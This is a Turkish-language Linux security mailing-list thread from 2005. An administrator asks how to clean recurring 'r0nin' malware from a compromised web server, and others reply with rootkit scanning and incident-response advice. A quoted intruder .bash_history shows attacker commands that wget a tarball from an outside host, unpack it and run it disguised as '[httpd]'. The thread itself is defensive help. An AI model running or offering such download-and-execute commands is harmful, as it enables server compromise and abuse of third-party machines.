Re: [Linux-guvenlik] r0nin

From: İlker Erek Duran (ilker.duran@gmail.com)
Date: Mon 18 Apr 2005 - 17:43:08 EEST

• Previous message: The RED: "Re: [Linux-guvenlik] r0nin"
• In reply to: The RED: "Re: [Linux-guvenlik] r0nin"
• Next in thread: huzeyfe@cc.kou.edu.tr: "Re: [Linux-guvenlik] r0nin"
• Next in thread: Serkan Kenar: "Re: [Linux-guvenlik] r0nin"

Merhaba,

netstat -tnlp çıktısını gönderebilirseniz aslında daha iyi olur ama
yine de girebildiklerine göre mutlaka bir executable
çalıştırıyorlardır. nobody kullanıcısının crontab'ına bakarsanız:
crontab -u nobody -l
sanırım birşeyler yüklemiştir. Eğer netstat ile bir port gözükmüyor,
crontab'da da herhangi bir kayıt yok ise bence işiniz biraz zor çünkü
muhtamelen root hakkı elde edip ls, who, cd gibi dosyalarınızı
değiştirmiş olabilir.

bir de netstat ve ps ile çalışan programları incelemenizde yarar var.
Process ID'lerine göre
/proc/$PROCESS_ID/cmdline
dosyalarına bakarsanız, çalışan zararlı programı bulabilirsiniz.
Ancak bunu bulup silmeniz bilgisayarınızı temizlemeniz anlamına gelmez maalesef.

Bu arada tmp dizinlerinin güvenliği için /var/tmp'nin /tmp'ye bir link
olması ve noexec bağlanması gerekiyor. Bir dahaki kurulumunuzda bunu
da göz önünde bulundurursunuz.

Bir de eğer PHP-Nuke açığı ile girilmişse root hakkı elde etmesi biraz
zor gibi.
/var/tmp/... (üç nokta :))
dizinine bakmayı bir deneyin, genelde bu şekilde executable'ları gizliyorlar.

-- 
İlker Erek Duran
E-posta: ilker.duran@gmail.com
Icq: 150824206
On 4/18/05, The RED <jdred@gmx.net> wrote:
> chkrootkit ile arattım. Sonuç:
> Checking `bindshell'... warning, got bogus tcp line.
> INFECTED (PORTS:  465)
> 
> sadece bu infected olarak çıktı. bu ne anlama geliyor? bildiğim kadarıyla bu
> port standart secure smtp portu.
> diğer kontrollerde bir sorun görünmüyor.
> netstat -tn ile baktığımda standart portlar dışında aktif bir port
> görünmüyor.
> 
> diğer bir tuhaf nokta ise, örneğin şu an sunucuda sadece ben bağlıyım.
> finger ve w ile de böyle görünüyor. Ancak who ile baktığımda şu anki
> bağlantım (pts/1) dışında pts/0 şeklinde 3 gün öncesi tarihli bir bağlantı
> görünüyor. şu şekilde:
> root     pts/0        Apr 15 03:23 (dsl81-215-*****.adsl.ttnet.net.tr)
> root     pts/1        Apr 18 11:18 (dsl81-215-*****.adsl.ttnet.net.tr)
> iki host (ip) da benim kendi hostum. pts/0'ın görünmesi normal mi?
> 
> işin en kötü yanı bu bir web sunucu ve yedekleyip başka bir sunucuya
> taşınması çok zor :(
> anlaşılan bu programlar en azından son 1 aydır sunucuda çalıştırılıyor zaman
> zaman.
> cpu loadının artışı ve arka planda çalışan bu uygulamalar dışında henüz
> başka bir etkiye (dosya silme, site hackleme vs.) rastlamadım.
> bu yüzden sunucuyu yeniden yüklemeden temizlemenin yollarını arıyorum.
> 
> Görüldüğü kadarıyla sunucuya giren kişi /var/tmp/ dizinine telnet ile
> giriyor ve o dizinde yapıyor yapacağını.
> /tmp/ ve /var/tmp dizinleri noexec olarak mount edilmemiş malesef. /var/tmp
> dizininin yetkisini kaldırsam (giren kişinin dosyaları nobody kullanıcı
> adına bağlı) sadece root'a rwx yetkileri versem bir daha girmesini önlemek
> açısından bir çözüm olabilir mi? home dizinine ulaşamazsa giremez herhalde?
> 
> bir de not: sistemde cpanel/whm kontrol paneli yüklü..
> 
> Teşekkürler.
> 
> ----- Original Message -----
> From: "Cem Ahmet MERCAN (HBM)" <mercan@be.itu.edu.tr>
> To: <linux-guvenlik@liste.linux.org.tr>
> Sent: Monday, April 18, 2005 2:46 PM
> Subject: Re: [Linux-guvenlik] r0nin
> 
> > Merhaba;
> >
> > rootkit tarayan programlardan biri ile sisteminizi taramanizi öneririm:
> > http://www.rootkit.nl/ programini     rkhunter -c komutu ile
> > http://www.chkrootkit.org/ programini     ./chkrootkit komutu ile
> > kullanabilirsiniz.
> > en azindan hacklendiginizden ve ne tur bir hack yada acik oldugundan
> > haberiniz olur. Ama sisteminizi bu halde birakmayin, sadece cok gerekli
> > olan cok az dosyayi bir yere kopyalayip sistemi sifirdan tekrar kurun
> > derim. Hatta bu sistemden gelen konfigurasyon dosyalariniza bile
> > guvenmeyin, eger gercekten o dosyaya hakim degilseniz.
> >
> > İyi Günler...
> >
> > Cem Ahmet MERCAN
> >
> >
> >
> > The RED wrote:
> >
> >>
> >> /var/tmp dizininde .bash_history oluşmuş. Sunucudaki exploit bir shell
> >> hesabı açıyor herhalde ve ev dizinini /var/tmp olarak veriyor. Normalde
> >> hiçbir kullanıcının shell izni yok. (sunucu web sunucu)
> >> /var/tmp/.bash_history dosyasının içeriği:
> >>
> >> e
> >> w
> >> /sbin/ifconfig
> >> w
> >> cd /var/tmp/.hu
> >> cd /var/tmp
> >> mkdir .hu
> >> cd .hu
> >> wget powerlock.home.ro/newpas.tgz
> >> wget powerlock.home.ro/newpass.tgz
> >> tar zxvf newpass.tgz
> >> mv newpass [httpd]
> >> export PATH="."
> >> [httpd]
> >>
> >>
> >> ----- Original Message ----- From: "The RED" <jdred@gmx.net>
> >> To: <linux-sunucu@liste.linux.org.tr>
> >> Sent: Monday, April 18, 2005 1:43 PM
> >> Subject: Re: [Linux-sunucu] r0nin
> >>
> >>
> >>> Birileri sürekli /tmp ve /var/tmp dizinlerine r0nin vs. gibi dosyalar
> >>> yerleştirip çalıştırıyorlar. Az önce de "atac" isimli bri şey yüklenmiş
> >>> ve
> >>> biraz önce bri atak yapıldı. 200-300 tane çalıştırılmış. ddos atağı
> >>> yapılıyor herhalde sunucu üzerinden. /var/tmp ve /tmp dizinlerindeki
> >>> dosyaların çalıştırılmasını nasıl önleyebilirim bilen yok mu?? Isletim
> >>> sistemi: Fedora core 1, kernel 2.4.22-1.2115.nptl,
> >>
> >>
> >>>
> >>> ----- Original Message ----- From: "The RED" <jdred@gmx.net>
> >>> To: <linux-sunucu@liste.linux.org.tr>
> >>> Sent: Monday, April 18, 2005 11:48 AM
> >>> Subject: [Linux-sunucu] r0nin
> >>>
> >>>
> >>>> merhaba. sunucuma bir süredir r0nin dadandi. daha önce temizlemistim
> >>>> yeniden
> >>>> /tmp/ dizini altina girmis. Daha önce de bu dizin altinda r0nin, brk
> >>>> gibi
> >>>> şeyler vardi silmistim ama bugün r0nin tekrar o dizinde.
> >>>> Internetten biraz arastirdim ama yeterli bilgiye rastlayamadim henüz.
> >>>> Nedir bu r0nin tam olarak? Apache ile ilgili bir açiktan bahsediliyor.
> >>>> Nasil
> >>>> bulasiyor? Etkileri (yol açabileceği şeyler) neler ve nasil tam olarak
> >>>> silinebiliyor? Bilen varsa lütfen yardimci olun.
> >>>>
> >>>>
> >>>
> >>>
> >>> --------------------------------------------------------------------------------
> >>>
> >>>
> >>>
> >>> _______________________________________________
> >>> Linux-sunucu mailing list
> >>> Linux-sunucu@liste.linux.org.tr
> >>> http://liste.linux.org.tr/mailman/listinfo/linux-sunucu
> >>>
> >>>
> >>
> >>
> >> --------------------------------------------------------------------------------
> >>
> >>
> >>
> >> _______________________________________________
> >> Linux-sunucu mailing list
> >> Linux-sunucu@liste.linux.org.tr
> >> http://liste.linux.org.tr/mailman/listinfo/linux-sunucu
> >>
> >>------------------------------------------------------------------------
> >>
> >>_______________________________________________
> >>Linux-guvenlik mailing list
> >>Linux-guvenlik@liste.linux.org.tr
> >>http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik
> >>
> > _______________________________________________
> > Linux-guvenlik mailing list
> > Linux-guvenlik@liste.linux.org.tr
> > http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik
> >
> 
> _______________________________________________
> Linux-guvenlik mailing list
> Linux-guvenlik@liste.linux.org.tr
> http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik
>

_______________________________________________
Linux-guvenlik mailing list
Linux-guvenlik@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik

• Previous message: The RED: "Re: [Linux-guvenlik] r0nin"
• In reply to: The RED: "Re: [Linux-guvenlik] r0nin"
• Next in thread: huzeyfe@cc.kou.edu.tr: "Re: [Linux-guvenlik] r0nin"
• Next in thread: Serkan Kenar: "Re: [Linux-guvenlik] r0nin"